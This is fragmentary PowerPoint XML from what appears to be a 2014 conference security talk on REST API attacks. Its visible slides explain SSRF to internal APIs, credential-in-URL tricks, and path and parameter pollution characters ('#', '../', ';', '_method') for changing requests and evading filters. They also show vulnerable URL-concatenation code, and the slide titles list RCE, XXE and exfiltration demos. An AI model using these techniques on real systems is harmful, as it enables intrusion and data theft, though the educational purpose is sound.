            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> data from the REST interface of the backend system or GET RCE on internal REST API</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>What backend systems have a REST API:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>ODATA in MS SQL Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Beehive and OAE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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>Neo4j, Mongo, Couch, Cassandra, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>Hbase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>, your company, and many more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228600" y="5364099"/>
            <a:ext cx="914400" cy="301752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53340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Non-compromised machine</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Flowchart: Terminator 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="5756767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19200" y="5726668"/>
            <a:ext cx="18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Affected machine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53919" y="685800"/>
            <a:ext cx="5513881" cy="5486401"/>
            <a:chOff x="3553919" y="1066799"/>
            <a:chExt cx="5513881" cy="5486401"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Flowchart: Terminator 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="3694176" y="4078223"/>
              <a:ext cx="1600201" cy="301752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SAP REST API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645153" y="4419599"/>
              <a:ext cx="381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owchart: Terminator 34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="4725925" y="4344924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SAP</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Flowchart: Terminator 35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="4037077" y="5640323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AS5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645153" y="5791197"/>
              <a:ext cx="381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Flowchart: Terminator 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="4722877" y="5640324"/>
              <a:ext cx="9144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2" name="Flowchart: Terminator 41"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="3675127" y="1925574"/>
              <a:ext cx="1638300" cy="301752"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartTermina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 REST API</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="76" name="Can 75"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6622182" y="20574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Mongo</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="77" name="Can 76"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6629401" y="29718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Couch</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="78" name="Can 77"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6629401" y="11430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Neo4j</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="79" name="Can 78"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6622182" y="394716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Cassan</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="81" name="Can 80"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6622182" y="487680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HBase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42" idx="1"/>
              <a:endCxn id="33" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4494277" y="2895600"/>
              <a:ext cx="0" cy="53339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Can 83"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6629401" y="5852160"/>
              <a:ext cx="914400" cy="54864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42" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3553919" y="2076450"/>
              <a:ext cx="7894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Terminator 47"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="5560888" y="1220913"/>
              <a:ext cx="762000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49" name="Flowchart: Terminator 48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="5564546" y="2138973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0" name="Flowchart: Terminator 49"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="5564546" y="3046056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1" name="Flowchart: Terminator 50"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="5564546" y="3960456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2" name="Flowchart: Terminator 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="5564546" y="4882173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sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Flowchart: Terminator 52"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="5564546" y="5948973"/>
              <a:ext cx="754682" cy="453771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API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42" idx="2"/>
              <a:endCxn id="48" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="4645153" y="1447799"/>
              <a:ext cx="1069850" cy="62865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2"/>
              <a:endCxn id="78" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6168774" y="1417320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2" idx="2"/>
              <a:endCxn id="49" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4645153" y="2076450"/>
              <a:ext cx="1069849" cy="2894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2" idx="2"/>
              <a:endCxn id="50" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4645153" y="2076450"/>
              <a:ext cx="1069849" cy="119649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2" idx="2"/>
              <a:endCxn id="51" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4645153" y="2076450"/>
              <a:ext cx="1069849" cy="211089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2" idx="2"/>
              <a:endCxn id="52" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4645153" y="2076450"/>
              <a:ext cx="1069849" cy="30326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2" idx="2"/>
              <a:endCxn id="53" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4645153" y="2076450"/>
              <a:ext cx="1069849" cy="409940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6172201" y="2331721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172201" y="3276600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168774" y="4236721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172201" y="5151121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168774" y="6172200"/>
              <a:ext cx="460627" cy="3047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Left-Right Arrow Callout 42"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7696201" y="1676400"/>
              <a:ext cx="1371599" cy="4158996"/>
            </a:xfrm>
            <a:prstGeom prst="left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EAI</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>EII</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>ESB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78" idx="4"/>
              <a:endCxn id="43" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7543801" y="1417320"/>
              <a:ext cx="838200" cy="25908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6" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7536582" y="2331720"/>
              <a:ext cx="540618" cy="34139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7" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7543801" y="3246120"/>
              <a:ext cx="339290" cy="274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9" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7536582" y="3947160"/>
              <a:ext cx="346509" cy="274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1" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7536582" y="4953000"/>
              <a:ext cx="540618" cy="19812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4" idx="4"/>
              <a:endCxn id="43" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="7543801" y="5835396"/>
              <a:ext cx="838200" cy="2910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87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SSRF (Server Side Request Forgery) to Internal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Attackers can take advantage of any server-side request forwarding or server-side request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>proxying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> mechanisms to attack internal-only REST APIs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Examples: RFI (Remote File Inclusion) through PHP include(), REST framework specific proxy (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>RESTlet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Redirector), XXE, WS-* protocols, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most internal REST APIs are using basic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> over SSL.  So you can use the same attacks above to find the basic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>credentials on the file system and embed them in the URL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://user:password@internalSvr.com/xxx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>...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49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/>
              <a:t>URLs to backend REST APIs are built with concatenation instead of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>URIBuilder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Prepared URI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3733800" cy="4495800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most publically exposed REST APIs turn around and invoke internal REST APIs using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>URLConnections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>HttpClient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or other REST clients.  If user input is directly concatenated into the URL used to make the backend REST request then the application could be vulnerable to Extended HPPP. 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352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7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URL (“http://yourSvr.com/value” +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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>new Redirector(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getContext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urlFromCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>MODE_SERVER_OUTBOUND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HttpGet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(“http://yourSvr.com/value” +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HttpPost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(“http://yourSvr.com/value” +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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>restTemplate.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ForObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>( ”http://localhost:8080/Rest/user/” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> request, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>User.class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a: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60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Extended HPPP (HTTP Path &amp; Parameter Pollution)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HPP (HTTP Parameter Pollution) was discovered by Stefano di Paola </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and Luca </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Carettoni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in 2009.  It utilized the discrepancy in how duplicate request parameters were processed to override application specific default values in URLs.  Typically attacks utilized the “&amp;” character to fool backend services in accepting attacker controlled request parameters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Extended HPPP utilizes matrix and path parameters, JSON injection and path segment characters to change the underlying semantics of a REST URL request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“#” can be used to remove ending URL characters similar to “--” in SQL Injection and “//” in JavaScript Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“../” can be used to change the overall semantics of the REST request in path based APIs (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> query parameter based)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“;” can be used to add matrix parameters to the URL at different path segments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The “_method” query parameter can be used to change a GET request to a PUT, DELETE, and sometimes a POST (if there is a bug in the REST API)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pecial framework specific query parameters allow enhanced access to backend data through REST API.  The “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>qt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” parameter in Apache </a:t>
            </a:r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smtClean="0"/>
              <a:t>JSON Injection is also used to provide the necessary input to the application receiver.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="378619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SAC 2014 Speaker Presentation Template - two speakers">
  <a:themeElements>
    <a:clrScheme name="Custom 16">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="337AB9"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="DDDEDD"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="337AB9"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="E47829"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="599EC4"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="808382"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="E99C42"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="51B8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RSAC 2014 Speaker Presentation Template - two speakers</Template>
  <TotalTime>21170</TotalTime>
  <Words>2974</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>330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RSAC 2014 Speaker Presentation Template - two speakers</vt:lpstr>
      <vt:lpstr>RESTing on Your Laurels Will Get You Pwnd</vt:lpstr>
      <vt:lpstr>Goals and Main Point</vt:lpstr>
      <vt:lpstr>REST History</vt:lpstr>
      <vt:lpstr>Causes of REST Vulnerabilities</vt:lpstr>
      <vt:lpstr>Attacking An Internal Network (REST style)</vt:lpstr>
      <vt:lpstr>SSRF (Server Side Request Forgery) to Internal REST APIs</vt:lpstr>
      <vt:lpstr>URLs to backend REST APIs are built with concatenation instead of URIBuilder (Prepared URI)</vt:lpstr>
      <vt:lpstr>What to Look For</vt:lpstr>
      <vt:lpstr>Extended HPPP (HTTP Path &amp; Parameter Pollution)</vt:lpstr>
      <vt:lpstr>Faking Out Security Filters (Scenario) </vt:lpstr>
      <vt:lpstr>Faking Out Security Filters (Bypass) </vt:lpstr>
      <vt:lpstr>Extended HPPP (Apply Your Knowledge I)</vt:lpstr>
      <vt:lpstr>Extended HPPP (Apply Your Knowledge I: Answer)</vt:lpstr>
      <vt:lpstr>REST is Self Describing and Predictable</vt:lpstr>
      <vt:lpstr>REST is Self Describing</vt:lpstr>
      <vt:lpstr>Especially for NoSQL REST APIs</vt:lpstr>
      <vt:lpstr>HBase REST API</vt:lpstr>
      <vt:lpstr>Inbred Architecture</vt:lpstr>
      <vt:lpstr>Extensions in REST frameworks that enhance development of REST functionality at the expense of security</vt:lpstr>
      <vt:lpstr>Rest Extensions Remote Code Execution(Demo)</vt:lpstr>
      <vt:lpstr>Rest Extensions Data Exfiltration Example (Couch DB)</vt:lpstr>
      <vt:lpstr>Rest Extensions Data Exfiltration Apply Your Knowledge(Couch DB)</vt:lpstr>
      <vt:lpstr>Rest Extensions Data Exfiltration Apply Your Knowledge(Couch DB)</vt:lpstr>
      <vt:lpstr>Incorrect assumptions of REST application behavior</vt:lpstr>
      <vt:lpstr>REST provides for dynamic URLs and dynamic resource allocation  Example Case Study</vt:lpstr>
      <vt:lpstr>Example Case Study Exploit</vt:lpstr>
      <vt:lpstr>REST Input Types and Interfaces</vt:lpstr>
      <vt:lpstr>REST Input Types and Interfaces</vt:lpstr>
      <vt:lpstr>XML Related Vulnerabilities</vt:lpstr>
      <vt:lpstr>XML Related Vulnerabilities</vt:lpstr>
      <vt:lpstr>XXE (File Disclosure and Port Scanning)</vt:lpstr>
      <vt:lpstr>XXE (Remote Code Execution)</vt:lpstr>
      <vt:lpstr>XXE Today</vt:lpstr>
      <vt:lpstr>XML Serialization Vulns</vt:lpstr>
      <vt:lpstr>Understanding XML Serialization</vt:lpstr>
      <vt:lpstr> Vulnerable XML Serialization APIs </vt:lpstr>
      <vt:lpstr>XML Serialization Remote Code Execution – XStream (Demo)</vt:lpstr>
      <vt:lpstr>XML Serialization Remote Code Execution – XMLDecoder(Demo)</vt:lpstr>
      <vt:lpstr>XML Serialization Remote Shell (Demos)</vt:lpstr>
      <vt:lpstr>JSON Serialization</vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
      <vt:lpstr>Questions/Call To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RESTing On Your Laurels Will Get You Powned</dc:title>
  <dc:creator>Abraham Kang</dc:creator>
  <cp:lastModifiedBy>Abraham Kang</cp:lastModifiedBy>
  <cp:revision>159</cp:revision>
  <cp:lastPrinted>2013-07-09T15:02:18Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-07-04T01:46:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-02-16T22:07:16Z</dcterms:modified>
</cp:coreProperties>
</file>